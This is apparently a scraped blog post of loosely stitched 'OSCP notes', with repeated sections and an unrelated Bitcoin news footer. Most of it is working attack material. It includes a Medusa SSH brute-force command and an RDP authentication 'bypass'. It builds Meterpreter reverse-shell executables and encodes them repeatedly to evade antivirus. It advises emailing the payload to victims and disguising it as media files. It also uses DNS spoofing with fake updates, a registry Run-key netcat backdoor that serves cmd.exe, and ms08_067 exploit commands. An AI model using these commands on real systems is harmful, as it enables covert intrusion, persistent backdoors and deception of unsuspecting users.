Random OSCP notes

Random OSCP notes
medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output

##Add personal banner to metasploit###

Hi
I know you gonna love this one :)
was playing with metasploit until i opened a folder called " UI"
Then i had an idea that i am going to share with you :)

How to make your own banner and add it to Metasploit ? !!
go into this directory
/opt/metasploit/apps/pro/msf3/lib/msf/ui/logos
and check out the content of every file expect test.rb

u can use this website to get nice banner templates

https://ift.tt/nm5ejI

When you made your own banner you need to give it a name and save it as " txt ".
Place it in /logos directory.
Now Open the file :  banner.rb and add your personal txt file " as shown in the photo ".
save and exit.

That's it , enjoy metasploit  ;)
#########################
##########How to bypass RDP authentication#############

RDP = Remote Desktop Protocol.

In this tutorial i will show you how to bypass the authentication window when trying to connect to a windows box on port : 3389 " Default RDP port ".
Unfortunately we will need to use Windows Box for it to work.

This is how an RDP client looks on windows:
Let's say you need to connect to a remote windows Desktop , after entering the IP , clic Connect .
This window will appear :
You will be asked to enter a password of the remote machine . Do not worry about it if you dont have it .
Go back to the remote connection window and clic on : Show Options .
this window will appear :
Clic on : Save as and save it on your desktop , it will look like this :
Right click it> Open with> Notepad

Change "authentication level:i:2" to "authentication level:i:0". What this does is take's all the security measures away from connecting. Like this :

Scroll down to the bottom of the notepad and add "enablecredsspsupport:i:0". Now press "Ctrl + S" to save that. like this :

Now open the remote desktop connection file we have just made.

You should get the regular remote desktop connection window. Enter a IP address and click "Connect".

You should get a screen that look's like this. Click "Connect" and it should connect you. If it brings up the credentials screen, enter your password and click "OK",

it will work now.

You will get this message, click "Yes".

And Voilla' :
Enjoy the tutorial and DO NOT TRY IT ON A BOX THAT IS NOT YOUR'S OR YOU HAVE NO PERMISSION TO CONNECT TO IT.
TCP connections are traceable .

###################
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15  LPORT=4444 x  > /root/Desktop/n1tr0g3n.exe
LHOST = your Backtrack IP address or attacking computer IP Address which will be waiting for the connection wirth meterpreter.

LPORT = Default port Metasploit uses " Just use it  ;)"

/root/Desktop/n1tr0g3n.exe =  Path and name you want for the .exe  "make sure to name it with the .exe extension so windows knows how to run it.

Output should looks something like this when it's done

Here's the command to encrypt the file 8 times using x86/shikata_ga_nai for those of you who might ask anyways and want to try and make it undetectable to AV's.  ;)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe -x/root/n1tr0g3n.exe -o /root/n1tr0g3n.exe

Just change the .exe name , LPORT and LHOST to the ones you neeed and you'll be good..

Now send this file to a user through email or jump drive if your on the same network and tell them to open it up and it will execute and start the listener  automatically.
Now were going to set up a listener with meterpreter waiting for connection from the victim.

open up terminal and type
msfconsole
once metasploit loads up type

use exploit/multi/handler                 ----->  Exploit you will be using

set LHOST 192.168.1.15       ------>  your Backtrack machine or attacker machines IP Address once again

set LPORT 4444                 ----> same default port metasploit uses and you chose while creating the .exe

set PAYLOAD windows/meterpreter/reverse_tcp             ------>  Payload used for reverse connection back to you.

exploit                      --------> to officially start the listener

Now go over to your windows box "victim" and double click the executable and watch as meterpreter opens a session, you should now have an open session on the exploited

box and have full control.

There's a lot you can do with this but you may want to bind the file to a mp3 or jpeg so when the victim opens it they get a generic error and don't really know what

happened in the background....We know what happened and would be suspicious but most people barely know how to surf the web so attacks like this can happen very easily

 :D


might i suggest using msfencode and using the shikata ga nai permutation a couple times to get it pass av and fw???

=) i know you already know this though!!!

To reduce detection its best to use various encoding options.

Bit like this ;
Code: [Select]

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.105 LPORT=5632 R | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o payload.exe


Also, if you want to use the exploit, best to test with AV on your local machine to avoid sites like VirusTotal passing it on to AV vendors.

could i suggest a different file type???

.VBS is not scanned by AV and works i would say 98% of the time =)


#################

Greetings
** This tutorial is an explanation ( Not detailed ) Therefore it is not for beginners , you need to be familiar with several steps:
-Proxy & socks
-Ettercap and Dns spoof
-Metasploit
-SET
-Netcat
-registry editing

Let's Begin

1 Start computer connect and get proxy.

2 DISCONNECT FROM INTERNET SAVE PROXY INFO BUT DONT RUN

3 change hostname & hosts file, then restart computer

4 then sign in (not connected to network) and change mac

5 open up firefox (still not connected) and enter proxy info

(optional: go into router and turn logging and firewall off)

6 connect to internet.

7 run nmap and etherape (optional: wireshark)

8 cp /pentest/windows-binaries/tools/nc.exe /root/Desktop

9 Run SET use java attack to start meterpreter session

10 DNS spoof the network


Now wait for the victim to download the fake update and you will get a meterpreter shell.

sessions -i (sessions # ie: 1)

**when meterpreter session connected**

(youll need to have netcat copied to desktop)

11 upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v System -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"


check it by:

reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run


-then-

spoof anything, add users, create folders/documents, take screenshots, kill processes, ect ect ect.

then type:

reboot

then to connect

nc (ip address) 1111

Enjoy  ;) do not be distructive.

#################

medusa -h <host> -u <target-account> -P <password-file> -M ssh -e n -O output

##Add personal banner to metasploit###

Hi
I know you gonna love this one :)
was playing with metasploit until i opened a folder called " UI"
Then i had an idea that i am going to share with you :)

How to make your own banner and add it to Metasploit ? !!
go into this directory
/opt/metasploit/apps/pro/msf3/lib/msf/ui/logos
and check out the content of every file expect test.rb

u can use this website to get nice banner templates

https://ift.tt/nm5ejI

When you made your own banner you need to give it a name and save it as " txt ".
Place it in /logos directory.
Now Open the file :  banner.rb and add your personal txt file " as shown in the photo ".
save and exit.

That's it , enjoy metasploit  ;)
#########################

set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15

# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

# So when you input anything where there is [], remember to remove the []

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_bind_tcp
set target 12
set lport 123
set rhost 192.168.177.131
exploit -i

use exploit/windows/smb/ms08_067_netapi
set payload windows/shell_reverse_tcp
set target 12
set lport 123
set lhost 192.168.177.128
set rhost 192.168.177.131
exploit -i

use exploit/multi/handler
lhost => 192.168.2.7
set lport 443
set payload windows/meterpreter/reverse_tcp

############################




from BITCOIN NEWS https://ift.tt/2CAOUhv
via Bitcoin News Update